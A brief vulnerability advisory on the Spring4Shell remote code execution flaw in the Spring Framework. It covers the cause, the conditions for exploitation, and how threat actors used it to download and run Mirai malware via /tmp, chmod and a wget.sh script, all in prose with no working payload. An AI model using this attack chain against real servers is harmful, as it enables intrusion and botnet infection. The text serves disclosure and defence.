Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux.
Note: This vulnerability is also known as Spring4Shell or SpringShell.
The RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical vulnerability. Spring4Shell is being activly exploited by threat actors to execute and weaponize the Mirai malware. This exploitation mainly occured in the singapore region. The sample is first downloaded in the “/tmp” folder and once permission change is executed, it becomes executable using “chmod”. Later, the “wget.sh” script downloads the binaries fron the attacker’s server and executes the samples.